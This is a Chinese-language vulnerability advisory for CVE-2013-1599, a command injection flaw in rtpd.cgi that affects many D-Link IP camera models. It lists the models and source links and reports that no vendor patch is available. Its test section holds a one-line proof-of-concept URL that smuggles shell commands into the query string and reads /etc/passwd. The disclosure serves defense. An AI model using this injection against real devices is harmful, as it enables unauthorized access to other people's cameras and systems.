D-Link多款产品命令注入漏洞(CVE-2013-1599)
D-Link多款产品命令注入漏洞(CVE-2013-1599)
发布日期:2013-04-30
更新日期:2013-05-11
受影响系统:
D-Link IP Camera WCS-1100
D-Link IP Camera DCS-7510
D-Link IP Camera DCS-7410
D-Link IP Camera DCS-6410
D-Link IP Camera DCS-5605/5635
D-Link IP Camera DCS-5230L
D-Link IP Camera DCS-5230
D-Link IP Camera DCS-3411/3430
D-Link IP Camera DCS-3410
D-Link IP Camera DCS-2102/2121
D-Link IP Camera DCS-1100/1130
描述:
--------------------------------------------------------------------------------
BUGTRAQ ID: 59564
CVE(CAN) ID: CVE-2013-1599
D-Link是国际著名网络设备和解决方案提供商,产品包括多种路由器设备。
多款D-Link产品在'/var/www/cgi-bin/rtpd.cgi'中存在安全漏洞,未经身份验证的远程攻击者通过相机的Web接口,可在受影响设备中执行任意命令。
<*来源:Francisco Falcon
链接:http://seclists.org/fulldisclosure/2013/Apr/253
http://www.exploit-db.com/exploits/25138/
*>
测试方法:
--------------------------------------------------------------------------------
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
http://www.example.com/cgi-bin/rtpd.cgi?uname&amp;-a;cat&amp;/etc/passwd
建议:
--------------------------------------------------------------------------------
厂商补丁:
D-Link
------
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:
http://www.dlink.com/us/en/home-solutions/view/network-cameras
评论暂时关闭